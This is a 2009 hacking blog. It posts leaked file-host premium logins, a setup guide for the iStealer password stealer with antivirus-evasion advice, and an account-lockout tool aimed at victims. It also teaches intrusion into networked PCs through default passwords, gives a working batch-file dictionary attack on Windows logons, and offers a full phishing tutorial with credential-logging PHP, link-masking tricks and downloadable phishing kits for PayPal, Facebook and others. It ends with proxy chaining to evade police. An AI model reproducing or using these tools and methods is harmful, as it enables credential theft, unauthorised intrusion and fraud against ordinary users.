Wednesday, September 9, 2009

Another account Released


accountid= 3870929
password= 44EfeM


hehe
enjoy everybody

Thursday, September 3, 2009

Another Rapidshare Account for all


accountid= 10260174
password= dEhdMsan

Friday, August 28, 2009

Rapidshare premium account for all


accountid=smoglegal
password=poop123

Saturday, August 22, 2009

[HOT] iStealer 5.0 & Tutorial


[HOT] iStealer 5.0 & Tutorial

Now made public...
Something like 50% detected. I recommend RDGMax's FUD crypter, it's $50.

This was purchased from the fake Kizar.
It is definitely not backdoored, we've analyzed it a LOT and it has over 800 downloads now. It's clean.

Also, iStealer v6.0 is coming soon. You will probably be impressed.
Want to post this elsewhere? Go ahead


Step 1:
Register at http://www.blackapplehost.com/register.jsp

Step 2:
Go to UserCP.
Click "Create/delete MySQL database"

Name the database what you want, it will include your username.
In this example my username will be "example".
I have named my database "example_db"
Press "Create Database"

Now for the user, I have named mine "example_user"
Password can be anything, mine will be "passw0rd"
Press "Create User"

For Assign Priviledges, make sure the user and database are selected on the list.
When all boxes are ticked, press "Assign Priviledges"


Step 3:
Download iStealer v5.0 (MOD)
Code:
http://rapidshare.com/files/270047855/iStealer5.1.rar


Step 4:
Open \iStealer5.1\PHP Logger\index.php and edit the configuration information.
All of the information is commented at the side, it's clear what it is. Leave localhost.


Step 5:
At BAH, go to "File manager" in the User CP and upload index.php & style.css
After this, your iStealer is set up, http://username.blackapplehost.com/index.php
Log in there to view your logs. Simple enough.


Step 6:


Open iStealer 5.0.1 and fill in all of the necessary information.
The "Url" will be http://username.blackapplehost.com/index.php




Complete!

Try this picture for guidance if you are having problems:





Sunday, August 16, 2009

How to get a cool website with FREE DOMAIN


THIS IS DONE IN TWO STEPS

1- CREATE YOUR WEB SITE
2- ADD YOUR DOMAIN

I will teach you in very detail and in steps


1- CREATE YOUR WEB SITE
FIRST OFF ALL GO TO THIS TOPIC TO SEE HOW TO CREATE WEBSITE

2- ADD YOUR DOMAIN


2.a REGISTER HERE TO GET YOUR FREE DOMAIN





2.b Setup domain of your choice

2.c Give name servers as
        ns1.x10hosting.com
and ns2.x10hosting.com

2.d now go to your cpanel

2.e Click on parked domain

2.f Add your above created domain there

2.g Wait for 12 hours

2.h Check your domain it will work completely





cheers you have a working website with domain Which looks like paid domain

Friday, August 14, 2009

earn 50$ per day


DON'T SIGN UP IF YOU HAVE NO INTENTIONS OF CLICKING

You may have heard of the popular ptc site, neobux, that pays you to click ads. This is a guide for how to make REAL money with them, without paying them a thing.

The only catch is you won't be making $50/day right off the bat. You will be making a few cents when you first start. The name of the game is called PATIENCE. Now, with this method, I won't be investing any money to earn money. If you have money to invest, by all means, do it and you'll see results faster than mine.

The key to making money on NeoBux is through referrals. It's simple, if you don't have referrals, you won't make money. You can rent referrals directly from NeoBux. The referrals are real people and cost 30 cents a month each. Some will be active and some won't. To "recycle" a non-active referral for an active one you have to pay 8 cents. It may seem like a lot, but it's worth it. If you don't recycle inactive referrals, you will lose money.

When you reach 75 cents by clicking on your own (if you don't invest money), you can purchase your first 3 referrals. This is where most people go wrong. It takes a few days to earn the 75 cents on your own and people are so eager to buy referrals that they just purchase as soon as their account reaches $.75. When people do this they do not realize that they do not have enough money to maintain their rented referrals and their referrals eventually are taken away because they can't pay for them. Before you rent referrals you should earn $3 by clicking on your ads and then transfer it to your rental balance. This way you have $1 per referral and you will easily be able to recycle them if they are not active or pay to keep them for one more month. It will take a while to get $3 on your own, but this way you will be able to keep your referrals and exchange the inactive ones for active ones without the fear that you will not be able to pay for them.

Autopay is another must. As soon as you rent your first 3 referrals turn autopay on. Referrals cost 30 cents a month to keep. Instead of you paying for the referral, they pay for themselves as long as you have autopay turned on. What it does it subtract one of the advertisements your referral views each day and puts it towards the 30 cents that referral needs to stick around for another month. So you get one less penny from each referral, but they will be your referral as long as they are active.

Cashing out too early is a huge problem for people that use neobux. When you request a payment it is INSTANTLY transfered into your alertpay/paypal account. In order to see if neobux is indeed legit (which it is) many people will earn a dollar by clicking and then cash it out. Woo-hoo. You now have a WHOLE DOLLAR in your paypal account. That dollar should have been put towards buying referrals. With this strategy you will be putting $3 into your rental balance before you buy 3 referrals. So $1 per referral. I actually would not cash out until I start reaching +1000 refs. Keep renting referrals by increments of 3 (you can rent by higher increments later as your referrals make you more money) and continue until you have 500 referrals. This will take quite some time. This is where most people flake out. When you reach 500 referrals, stop buying referrals and just maintain the ones you already have. Keep doing this until the money builds up to about $100 and you can use $90 of it to pay for golden. $100 won't take very long at all to get once you have 500 referrals and once you upgrade to golden your earnings will DOUBLE. This is the great part. Golden costs $90 a year but instead of getting half a cent for every advertisement your referral views, you get 1 cent. Your earnings double. That's all there is to it.

Keep renting new referrals after you upgrade to golden and don't cash out. Remember, you haven't cashed out at all, and you shouldn't until you have 2000 referals. But when you do cash out, you will be able to cash out about $50 a day. And that's the end of the strategy.

P.S. It will also help you in your neobux adventure to get direct referrals, with the use of a referral link, such as the one below. Please sign up under me. You don't have to, but I would appreciate it, in exchange for the info


to create an account on neobux and start earning click here
http://www.neobux.com/?r=indianpayer

Monday, August 10, 2009

How to verify your own PayPal without a credit card!!



1. Make sure you have a PayPal account made. If you don't, go to www.paypal.com

2. Now go to Netspend https://www.netspend.com/ and click the big green "Open Account" button.

3. Fill out the info, for the address put in anything, could be your real one doesn't matter. They will send a card to that address most people will throw it out as junk mail if its a fake address.

4. Log in to your PayPal account. Hit the "Get verified" link (image provided)






5. When the new page comes up, hit "Add Bank Account".

6. Log into your Netspend account. Go to "Add/Manage Money", then "PayPal Transfers".

7. Copy and paste the necessary info from the Netspend account to the PayPal Verification fields. Wait 3-5 days for the deposit.

8. Enjoy Spending!!

Rapidshare account for all


login- 29503
pass- x2VFdj

Monday, August 3, 2009

way to create a wesbite-->no php or any language knowledg needed


way to create a wesbite-->no php or any language knowledg needed


we will take help of clone script for creating a wesbite.
simpally go to
scriptplazza.com
and go there in scripts section
and there you will find many scripts.
download anyone of them depending on your need.
now its the time to create your website.
all you have to do is to upload that downloaded file on your server.
x10hosting.com
and sign up like a free user
now after signing up do login.
you will find your cpanel
under that there would be written " file manager"
click on that


now click on upload and upload the files which you downloaded at scriptplazza.com
and your 95 % work is done.
now there may be two possibilities.
one is
[1]you need to give database address.
[2]you dont need to give database address.
now i am going to explain both the cases.

[1] you do not need to give the database address.

look at bellow websites
http://www.populariseyourblog.net.tc/
http://www.searchenginesubmitter.net.tc/
http://rankyourpage.net.tc/
http://www.searchanyvedio.net.tc/
http://www.hostimage.net.tc/
while creating this site i did not configure databse because "registration" these types of options is not at this site.
actually if you are creating a site like orkut.com then you need to configure databse but in sites like above
you dont need to give database address.
now moov to case 2.

[2] you need to configure databse..

hmmmm
its very easy
simpally look at index.php name file or config.php file.
and in any1 of these files they will be asking to you the database file name and login and pasword of database.
mind it ,in index.php or in configphp ,there it would be mentioned properly that where you have to write these details.
just give the details
now the final step is to get your your website address

hmmm it is very easy
your websiteaddress syntak is


http://YOUR_USER_NAME.x10hosting.com/FOLDER_NAME_OF_YOUR_SCRIPT/


and your site is completed now.

the tut may seem to
be difficult
but once you will start doing you will make a site in 15 minutes.
have fun...


you can edit index.php or other folders to put your ad codes ...
have fun.

rapidshare account


new rapidshare account for my fans

login- mlsmls
pass- alldmls

Saturday, July 25, 2009

best websites


super cool websites created by me

make your blog super popular by submitting your blog to all blog engines and atract huge trafic to your blog
http://www.populariseyourblog.net.tc/



make your website or blog super popular and get high traffic by submitting your site to all search engings
http://www.searchenginesubmitter.net.tc/



increase trafic to your site by submitting your site to the google page rank
and 
also see the rank on any web site

http://rankyourpage.net.tc/




search any vedio on youtube with no complection
http://www.searchanyvedio.net.tc/





send anonymous mail to any person with anyones email id
http://www.sendanonymousemail.net.tc/



best image hosting service
http://www.hostimage.net.tc/



find any article or ebay book or any other book on net
http://www.findarticle.net.tc/



search any mp3 on the web
http://www.tracemp3.net.tc/

make $ with bidvertiser












create account with above logo
paste the code generated for bidvertiser on your blog or on your website
and earn $

Thursday, July 16, 2009

Stealing Phishers To Get Free Logs


Contents:

Step 1 (Finding hosts)
Step 2 (Getting logs)
Step 3 (Other way to get logs)
Step 4 Check the quality
Step 5 Enjoy and share


Step 1

You need a list of hosters phishers use. Search for free hosts which allow php. In this tutorial I will be using ripway.com, which is used a lot by phishers.

Step 2

Getting logs.

Choose a site from the list made in step one. Go to google and search for:
Code:
site:ripway.com filetype:txt
Now the results will show .txt files on that hoster. Go throug the sesults and you will find phishers soon. Open them and save them. Congratulations, you stole a phisher!

Step 3

However most of the time the hoster will have shut down the phisher. There is a nice trick for this. Just use googles cache. I love the cache <3!>

Step 4

You need to check the quality. For this you can randomly choose accounts and try them. But a better method are account checkers. You insert your list there and that program checks all of them for you. Let them check, and save the accounts that work.

Step 5

Have Fun with this information

Tuesday, July 14, 2009

~Guide: Staying Safe Online ~


~ Guide: Staying Safe Online ~
How to stay safe online V1.0
In this guide, I will be showing you examples and telling you how to be pro-active on the internet. The Internet is full of surprises, good and bad, that is why you need to take action. We’re going to start off with Personal Information Topic.

Personal Information:

Have you met someone on line? They seem extremely nice and wish to be friends at a fast pace? Well, that is only some of the warnings. When people try and make friends fast on the internet, most of the time, they are trying to get something out of them. Maybe some fun with their rat or perhaps just to mess their computer up for god knows what.
If you wish to protect yourself, you can take these few tips:
1) Never give your name out. Not even first name.
2) Don’t tell them what country you live in.
3) Don’t ever tell them your contact information.
4) Ignore and report threats, or something dangerous.
5) If anyone gives you a program, Check the size and run it in sandbox incase it’s malicious.

Ultimate Download Pack:
Without Anti-Malware, You’re asking for trouble. If you surf the internet often without one, you’re asking for trouble. If you accept files via MSN without one, you’re asking for trouble. Too solve this error, download all of the following:


http://WWW.Avast.COM
http://WWW.MalwareBytes.COM
http://WWW.Ccleaner.COM
http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis 
http://WWW.sandboxie.COM


Those will help you maintain and run a smooth system, but be careful with Hijack this. Don’t kill any processes that you aren’t sure about as that process may be for running a system. If you question about something, submit your HJT (Name) log in the white hat section of Hackforums.net.

Surfing the web:

Surfing the web is all about the computer, we all love it, and therefore we got to protect ourselves. A good way to protect yourself and anyone else who uses your computer is to use a proxy. When surfing online just protect yourself. There is no point in not, your online, why not do it.

Anti-Keylogging Programs:

Key Scrambler Pro
Download Link: http://download.cnet.com/KeyScrambler-Personal/3000-2144_4-10722575.html

Task-Manager:

Codestuff Starter is a good program to use, you can see all the proccesses that are running even the ones that aren't viewable on task-manager. Over all, this is what I prefer rather than the plain old task manager. Below are pictures of how to use it.

Download Link: http://codestuff.tripod.com/products_starter.html



This is the part where you are able to disable programs on startup, it comes pretty handy in my opinion.



As you can see, I scrolled down with my arrow and saw that this proccess was legit because it said Microsoft. If it says a corporation not known, this is most likely something malicious, therefore you can kill the process.

Firewalls:


http://www.comodo.com
http://www.zonealarm.com


In my opinion, I recommend Comodo Firewall. It's fast and easy to use, But I also use zonealarm on my other PC. Either work fine, there both effective.
Here is a picture of what comodo looks like:



How to use sandbox effectively:

There are two ways to use it. Right click the .exe or put the file in the sandbox like so.



Drag the suspected malicious file into the Sandbox. Let it run, Too make it sure it isn't running on your system, look to check if there is a [#] on the name of the program.



MalwareBytes:

MalwareBytes.Com




A good Anti-Malware Program. Just use this to scan for malicious programs. It works like a charm.

Do you think your infected? Well, Use Hi-jack this. The HJT will help you figure out wether or not you are infected.





Submit this log to the HJT section.




Hijack Ananlyst will take this and make sure you aren't infected.


If you have a File you aren't sure about, test it on your virtual PC. You can download VMware and the XP from torrents.




Anything else I can add to this guide? Please leave me feedback.

If you have any questions, Leave comments, please. :P

Thanks guys

Account Freezer.


This is going to be the updating version of my Account Freezer.


V1.0
Updates:
none (Initial Release)

Features:
Let's you freeze Facebook, Windows Live, and YouTube accounts. Coming soon are MySpace and AIM too, the code is there it's just that the page loading is funky.

How it Works:
Many sites have a feature that after xx amount of invalid logins (usually around 20-25, but this program does 30 just for good measure), the account is either disabled for an allotted amount of time (an hour or so, depending on the site), or the account is disabled until reset through the user's email. This program basically spams the login with the username you enter, and the password "1234567890", until the account is disabled.

Usage:
Select a website from the drop down list (right now there is only Facebook, Windows Live, and YouTube), enter the email/username of the victim, then hit Freeze. You'll hear a bunch of clicking, which is the web control submitting the login form. The 'Let me watch' check mark expands the program to let you see it in action.
Note: It uses an internet explorer web control






Link:

http://www.sendspace.com/file/r11xuo

Monday, June 22, 2009

rapidshare account for all


accountid= 9640819
password= HaUULC3s
Expiration date: Wed, 1. Jul 2009

enjoy and for saying thanks contact me at tushar.kesarwani2@gmail.com

Saturday, June 20, 2009

scaning + getting into someones computer


scaning + getting into someones computer

I KNOW NOW ALL OF U HV TURNED IN 2 RED .,anyway let's start scanning

rapidshare.com/files/143057612/Scannzxsxzxing.rar

first of all download dis ...
it conatain
angry ip scanner,n map nd some more scanning tools.
it is d final stage of information gathering of an attacker.
in scanning a hacker/attacker looks for these stuffs.
specifc ip address
operating system
service running on d system.
u or any1 can skip footprinting bt not scanning.
in scanning we look 4 d open ports nd we look 4 d vulnerabilities existing in our target.
before of writing about scanning i would like 2 clear u d concept of ping.
knowing d actual meaning of ping is very much essential 4 doing scanning.
PING---->PING, i m nt telling u ping's actual definition ,i m just giving u d idea of ping
open run ,type cmd ,hit enter nd nw type ping nd hit enter.
nw u vl see der many things just read dhem,well nw moov 2 ping again.
suppose dt we r pinging 2 any website then it means we r sending some data 2 dt website.
suppose dt u want 2 check ,ur freind is online or nt?
then simpally ping his ip address.i mean suppose dt if his ip address is
192.255.29.32 then
open command prompt[command prompat=run->cmd>enter]
nd type
ping 192.255.29.32
if nw u vl see dt 4 data packets has been sent 2 ur freind ,nw u vl see der written loss.
actually if ur freind is online then he gets ur ping nd if he is nt then u vl see der 100% loss.
in short ping is sending data 2 a specific address nd it can be done 2 check wether dt person/website is conneted 2 internet or not.
hoping u ppl hv got d idea of ping .nw proceed 2 scanning.
freinds
nw it's d time 2 be active,quick,sharp nd hardworking.
anyway

i am again telling u d objectives of scanning.these r

to detect wether d system is connected 2 internet or nt?
to discover vch ports r active/running?
to discover d operating system running on d target system[known as fingerprinting]
to discover d ip address nd services running on d system.
let's start scanning now.
bcoz nw every1 of u know pinging some1 there4 1 step of scanning u can do urself nd dt is checking a system/person is connected 2 internet or nt?suppose dt u want2 ping google or orkut or ur freind then use dis blue syantax in d command prompt
ping ip adress
or
ping google.com

oki.
nw ,in modern era der r thousands of tools available 4 scanning,der r thousands of softwares bt we will be using only 2 tools,one is angry ip scanner nd d second 1 is n map.
these 2 tools r enough 4 ur purpose,wen we will learn sniffing we will use some wifi scanners nd lan scanners bt here in dis topic we will learn using they 2.
ANGRY IP SCANNER--->an ip scanner 4 windows,it can scan alive ips in a range ,a very beautiful nd good tool 4 scanning.actually dis software do nothing
but pings all d ip addresses nd gives u information.

USING ANGRY IP SCANNER--->[ThEORY PART]

all u hv 2 do is 2 specify a ip range vch u vant 2 scan for.
suppose dt up ip address is
192.167.23.23
then it is sure dt d connections vchr nearer 2 ur home ,they r having d ip address assigned vd
192.167.23.01 to 192.127.23.99[plz look d last digits of ip address]
nw 4 knowing vch 1 of these ip address r live nd working,all u hv 2 do is 2 just scan d range,
dis software can scan any range.

USING ANGRY IP SCANNER--->[PRACTICAL PART]

using ip scanner is very easy.
simpally give d range u want 2 search 4 nd search
d addresses where u can see d green light.right click der nd watch details.after of right click u can see many more things ...have a look at all of dem.
hping2,firewalk opuput
these r also some tools 4 scanning purpose bt 4get them


der r many other tools also like superscan,ipscanner,megaping,floppyscan.
well,floppyscan is d best scanning tool but it is 4 linux.it finds open ports .
freinds nw d other purpose of scanning is also 2 get vch operating system has been loaded on ur target machine,see,each operating system has its own unique vulnerabilities der4 knowing dt vch ohperating system is ur victime is using,is very necessary.
getting this information is called fingerprinting,
IN WINDOWS
based operating systems u can do fingerprinting
by using N-MAP
.


N MAP-->it is 4 finding open ports in a system or in ur victim's computer.
it does many type of scanning nd undoughtly it is d most beautiful tool 4 scanning.
nw u ppl hv learnt using angry ip scanner.wen u vl use it u vl see red coloured nd green coloured blinking lights.green clr is alive ip ,alive ip means they ip addressess are active dis moment.'
it is d biggest truth of hacking dt a person can be hacked only in d case wen he is online[brut force attack->exeption]
nw u ppl find dt he is online.

<-------------N-MAP------------------------->

IT is d most beautiful tool 4 windows 4 scanning purpose.plz dont mind its small size.it is d perfect tool conatining more than 20 type applications.
we will be learning all of dem.
b4 of learning n map plz be cool.
u must know many things b4 using it .let's learn de.
sorry,1 thing i forgot 2 write,der is nothing in d scanning arena vch it cann't do.it is d most lovely scanning tool of all d good hackers.

SOME OF D SCANNING WAYS USED BY N MAP--->

X MAS TREE->d attacker checks 4 tcp services by sending "X mas-tree"packets.these r only name .take these easy.
SYN STEALTh->IT IS half open scanning.
WINDOW SCAN->IT can detect open ports.

-------------> SCANNING WAYS OF NAMP FINIShED 4 NW<-------------------

----------->TCP COMMUNICATION FLAGS<------------------
SYNChRONIZE->>;known as syn,it is used 2 initiate a connection b/w hosts

ACKNOWLEDGEMENT-->also called ack.it is used in establishing a connetion b/w hosts.
FINISh-->kNOWN AS fin,it says 2 remore connetion 2 do no more transmission.
RESET--->known as rst,it is used 2 reset a connection.

--------->CONCEPT OF 3 WAY hANDShAKE<---------------------
suppose dt JhON IS chatting vd his girlfreind selina,then this communication vl folow this methode.. john--->[sends syn named packet 2 selina]

nw
selina--->[sends syn-acn named pack 2 john]
nw

john----->[sends ack named packet 2 selina]
nd nw d communication b/w dem is established.
this is 3way handshake.
hacking thru dis concept vl come after of some time.dis moment memorize dis concept.

INSTALLING N MAP---->
OPEN namp software nd install,while installing it vl say dt winpcan is missing nd it vl show error ,ignore dt nd install it ,after of installing go in
C>>programfiles>>n map>winpcap
open winpcan,here u vl see 2 .exe files,install any1 of dem.
nw ur n map is fully installed.

------------>USING N MAP<-------------
first of all get any alive ip address 4m angry ip scanner,nw put it in n map search box nd search 4. u can scn 4 many things .mind it n map provides u all type of scanning,keep checking different boxes nd scan 4 every1. freinds nw hack is going 2 be,u ppl r going 2 hack many computer after of just 5 minutes ..first of all i vl give here a practical item then whole concept . be prepared 2 do ur first hack in 2 oder's computer .

------->HACKING IN 2 A COMPUTER<------------

well, it is very easy. frist of all search 4 any ip range, get d alive ip list. go on any alive ip address. right click der open computer>in explorer

in present era,in india most of d airtel users [nd other internet service users also ]does nt fix a password 4 conneting derself 2 d internet .de leave it blank nd here due 2 der dis mistake u can hack in 2 der computer.
if after of
open computer>inexplorer
it asks 4 password then give password
"admin"
vdout quotes
nd see,if u get entry in his computer,it is nt necessary 2 enter in all d computers,bt by dis technique u can enter in some of d computers.
all dis tute is based on angry ip scanner.no use of n map.

----->HACKING IN A COMPUTER[ADVANCED]<--------------------
WELL d technique is same as d previous 1 . only der r few chnages. suppose dt u want 2 hack a specified p.c. then get dt person ip address nw scan in n map 4 dt ip address nd look 4 open ports. if port no. 80 nd 21 r open then get dis ip adress in angry ip scanner nd try 2 enter in his computer using default password admin apart of it in angry ip scanner wen u right click u see der open computer nd many options i.e.telnet,ftp,http try 2 connect vd every1 of dem. if ur luck is vd u then u can enter in his computer. scaning is finished 4 nw. u enterd in a person's computer ,this thing is also a part of enumeration. anyway nw i vl start d topic. HACKING E MAIL IDS[INCLUDING ORKUT] scanning finished 4 nw.

----------->SUMMARY OF D ChAPTER<-----------------

[1]use angry ip scanner 2 scan various ip range
[2]use n map 2 do all type of scanning.
[3]scanning is done 2 find information about open ports,running operating system on system nd many othre things
[4]we can enter in oder person computer using angry ip scanner. link download angry ip scanner ,n map nd some odr scanners
rapidshare.com/files/143057612/Scannzxsxzxing.rar
----------------------->SCANING FINIShED<----------------------

HACK any system in LAN


HACK any system in LAN

LAN Remote user - Dictionary Attack Create and use this Batch file
to launch a Dictionary attack and find the Windows logon Credentials in a LAN.
You need a Dictionary text file to proceed further to launch this attack successfully.

Just Follow the steps below,

1. Open up a Notepad file.
2. Copy and paste the below code and save it as a Batch file with .bat extension.

@echo off
if “%1″==”" goto fin
if “%2″==”" goto fin
del logfile.txt
FOR /F “tokens=1″ %%i in (passlist.txt) do ^
echo %%i && ^
net use \\%1\ipc$ %%i /u:%1\%2 2>>logfile.txt && ^
echo %time% %date% >> output.txt && ^
echo \\%1\ipc$ acct: %2 pass: %%i >> output.txt && goto end
:fin
echo *****Done*****

3. Make sure that you have a Dictionary password Text file in the same location where you are going to execute this program. ( Name should be passlist.txt )
4. Now goto the command prompt and then execute this program from there, along with the Target compters IP address or Hostname and the Valid Username.

The Syntax should be like this,…
C:\>LANbrute.bat 192.169.21.02 Administrator

Where,

LANbrute.bat - This is the Name of the batch file that resides in the C Drive.

192.169.21.02 - IP Address of the Target Computer.

Administrator - Victim Account that you want to crack.

5. This program will start launching Dictionary Attack against the Adminstrator account on the Mahine 192.168.21.02, by using the passwords from the file passlist.txt and will not stop until it finds a right match.

6. If the right password was found, then it will save it in a text file named ‘output.txt’ on the same directory

phishing


now hacking starts
first i will tell u about the core of hacking
see hacking is nothing but a bundle of teckniques
here i will try to touch probably all the teckniques which i know
one of the most important tecknique is phishing
here i will teach each and everything regarding phishing

phishing

1. Intro
There are couple of other phishing tutorials around the net, but some people seem to have
problems understanding them. So I'll try to be as simple as possible.
This phishing tutorial is written for newbs,
and if you have problems understanding it,
then you need to get some beginner level computer knowledge first.

-This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.

2. What is a phisher?
Phisher is something that looks like a login page(a fake login page), that writes
the username and the password to a file,
or does whatever you want.

3. How to make one?
All you need is a web hosting service with PHP enabled.
We will use justfree.com. Go to justfree.com and sign up for a free account.
In this tutorial we will make a phishing site for myspace
(the procedure is equivalent for most of the sites). While not signed in myspace,
open anyone's profile and click on his picture. That will lead you to Myspace's
login page that has the red box with"You Must Be Logged-In to do That!"
just above your login form. Now, click File>Save Page As, and save the
myspace page to your Desktop. Open your saved page with any text
editor(notepad, wordpad etc.).
Select all of the text(the source code), and copy it create 'New File',
and paste the Myspace's source code there. Name the file 'index.php'(without the ''),
and save it.

Now you have made a page equal to Myspace. Everything on that page will have the same
function as if it were on the original site. The link to your phish site will be
'www.xxx.justfree.com/index.php' - where 'xxx' is the name of your account
(you can name it anyhow).
But there is a little problem. When someone enters his username and password and press
login, it logs him into the real myspace.

What do we need to change?

What we need to change is the action of the 'login' button, so instead of logging them
into the real site, it writes the username and password to a text file.
Open your 'index.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code
(for the sign in button, search button, etc.). We need to find the 'action=some link'
that refers to the Login button.

After some searching, we find the part like this:

form action="http://secure.myspace.com/index.cfm?fuseaction=login.process"

method="post" id="LoginForm" name="aspnetForm">
and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"'
refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="login.php"

and save the file.

Formerly, when you click the login button it would take the values in the
username and password boxes,
and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process'
file.
Now when you click the login button it will take the values in the username in password
boxes, and execute the functions in the 'login.php' file on your site
(which doesn't exist yet).

All we have to do now, is to create a 'login.php' file that contains a function that
writes down the username and password into a text document.
Make another file named 'login.php'(without the quotes) and paste the following code in it:

?>?>?> $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The function of login.php is simple. It opens a file named 'passwords.txt'(and creates
it if it doesn't already exist) and enter the informations
there(the username and password).
Congratulations! You have a phisher!
The link to your phish site is:
http://xxx.justfree.com/index.php -where 'xxx' is your account name.
The link to your text file is:
http://xxx.justfree.com/passwords.txt
Or you may access it from your account.

Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.

4. How to trick people to fall for it.
There are billions of ways how to do it, your creativity is your limit.
Most common way is to make an email similar to the admin,
and sending them some report with a link to log in the site(your phish site).
Ofcourse you will mask the link.


How to mask the link?
If you're posting it on forums, or anywhere where bb code is enabled,
you're doing this:


Code:
[url=YourPhishSiteLink]TheOriginalSiteLink[/url]


If you're making the phisher for myspace, and want to get random ppl to it,
you can simply make some hot chick account and put some hot pic that will
lead to your phish site when clicked. So when they click the
lusty image, they will be led to your phish site telling them they need to
log in to see that.

Like this:


Code:
[url=YourPhishSiteLink][img]link of the image[/img][/url]


When sending emails see for the option 'hyperlink', and it's
self explainable once you see it.
There are many other ways, and as I said, your creativity is the limit.

5. Outro
I hope that this tutorial was helpful and simple enough. It explains how to make a
phisher, and how it works. Although is written for Myspace, the procedure is
equivalent for almost every other login site(for hotmail is different).
After this, it's up to you to explore, experiment and dive in the world of social
engineering.

the most important function of phisher is getting premmium accounts i have got premmium accs of many sites
including rapidshare and megaupload

phishing steps for hacking rapidshare accs

phishing is not difficult, if u follow my core steps ....

HERE I WILL POST METHORD TO HACK rapidshare ACC(s) ONLY

 

STEP 1:- creat acc on www.justfree.com

STEP 2:- DOWNLOAD http://rapidshare.com/files/240286481/rapidshare.com_best_.rar and extract

STEP 3:- upload the phishing files(in your justfree acc) of those websites whose passwords u want to hack

STEP 4:- now go to your justfree acc. u will see the file named index. click on that file
new page will apear. copy its link from address bar

STEP 5:- now go to google and search list of url shortners . u will find many
web sites. open any one . paste your link (of step 4 ) there and get shortened link

STEP 6:- nw u r done. just go to any download forums or orkut community and post some good
software details with the above link. whenever any premium user will download that
software he will put login and password there and u will get that in your justfree
acc (txt file )[/YELLOW]
IF U R CLEVER ENOUGH U CAN GO PHISHING OF REST OF THE SIDES BY YOURSELF


IF PROBLEM PERSISTS ASK HERE .......!!!!!!

BEING MY STUDENT, TILL NOW U ALL HAVE GOT THE KNOWLEDGE OF PHISHING, SO NOW I M GIVING U,
THE PHISHING PAGES OF MANY POPULAR WEB SITES

facebook phisher:-
http://rapidshare.com/files/240288443/FaceBook.rar

AIM phisher:-
http://rapidshare.com/files/240293121/AIM.rar

eBay phisher:-
http://rapidshare.com/files/240293192/eBay.rar

Hi5 phisher:-
http://rapidshare.com/files/240293261/Hi5.rar

hotmail phisher:-
http://rapidshare.com/files/240293321/Hotmail.rar

paypal phisher:-
http://rapidshare.com/files/240293396/PayPal.rar

photoBucket phisher:-
http://rapidshare.com/files/240293501/PhotoBucket.rar

runescape phisher:-
http://rapidshare.com/files/240293593/Runescape.rar

yahoo phisher:-
http://rapidshare.com/files/240293699/Yahoo.rar



after phishing keyloger comes
people have got accs through keylogger but personally i don't follow this methord
so i will not explain this method

proxy


now come is proxy
doing proxy
proxy is changing ur ip adress
as i already told u that your ip address is d unique address on vch data r sent 2 you
nw think that if u r doing any wrong work then what will get pollice to you'r hame . it's you'r
ip address ..... so if u tell the web wrong ip address then police will go to any other's ip address
and u will be safe...

we get many benefits from proxy.
[1]we can download multiple files 4m rapidshare
[2]by dis we can bypass a firewall
[3] der r many sites vch allows only one account on 1 ip address,on dose sites we can make multiple ids by dis.
[4]4 being safe while doing cyber hackes,it is very much essential 2 do proxy.
[5]after of doing proxy,we can fool other person very easily.
learning proxy is very imp. bcoz while doing cyber hacks it makes u some safe

lemme tel u something about working of proxy.
U------>SENDING DATA 2 GMAIL------->GMAIL REPLYING 2 U

AFTER OF DOING PROXY THIS THING LOOKS SOMETHING LIKE DIS

U---->PROXY SERVER--->GMAIL SERVER------>PROXY SRVER-->U

NW i think u hv got d idea of proxy


for doing proxy follow these simple steps----->>>>>
AS I TOLD U PREVIOUSLY PROXY IS Changing ur ip address.it is very much easy.
first of al write in google"list of proxy address" or u may search 4 "free proxy server"
nw many links will come.go on any1 of them.
now on that website u vl find many ip address nd port no.s.
these r d adress of proxy servers.now copy any1 of de address.mind it,u hv 2 copy both d things,i mean port no. as well as ip address.
now open ur internet explorer nd go in
tools>internet option>connection>lan setting
go in lan setting,der u vl see 2 blue lines.one is AUTOMATIC CONFIGURATION ND d second one is PROXY SERVER
in proxy server named tab u vl see 4 blocks.2 for ticking nd 2 for giving address.tick both of dem boxes nd in address put d ip adress u copied nd in port no. put d port no. u copied.never forget 2 tick both d boxes .now click o.k.
nw open whatismyip.com
nd u vl see dt ur ip address has been chANged.
in mozilla firefox go here
tools>options>advanced>network>settings
nd in settings put d ip address nd port no.
dis is d same operation vch is carried out in all type of browser.
der r many softwares 4 dis purpose.all of dem r shit nd nothing else.
der is anonyomous proxy list verifier named software nd many more ,all of dem do d same work.i don think any1 should use dem.
u can do d above said work in a more simple way also.
simpally open http://www.proxy4free.com/ named site.
der in most left side u vl see written "proxy list"
in proxy list der vl be many lists named list 1list 2 list 3 nd many more .simpally go on list 1 nd copy ip nd port no.l 4m der


nw i will tell u about proxy flooding :-
this is well explained frm its name
however i will tell u

in this case u have done many proxy 1 after the other

this will be well explained frm the bellow chain (think that u r sending data to google)

YOU'R SERVER ----------> 1ST PROXY SERVER ---------2ND PROXY SERVER --------> THIRD PROXY SERVER --------->and so on -------> g mail server

name of tools 4 doing proxy floding-->
SocksChain,happy browser tool,multiproxy,tor
these are d tools 4 doing proxy flooding,wen u r doing something highly illegal then first of all use any1 of dese softwares nd nw do vatever u vanna do .now u r very much safe/
tool "multiproxy"is a very very very good tool
90+ Proxy Websites To Access Blocked Websites
http://www.hidemyass.com
http://www.anonymizer.com
http://www.wujie.net
http://www.ultrareach.net
http://surfshield.net
http://www.guardster.com/subscription/proxy_free.php
http://anonymouse.ws/anonwww.html
http://www.browser-x.com
http://www.spysurfing.com
http://www.xerohour.org/hideme
http://www.proxyz.be
http://www.sc0rian.com/prox
https://www.proxify.us
http://kproxy.com/index.jsp
http://www.brawl-hall.com/pages/proxy.php
http://www.proxify.net
http://proxy.computersteroids.com/index0.php
http://www.unipeak.com
http://flyproxy.com
http://alienproxy.com
http://proxify.com/
http://www.unfilter.net
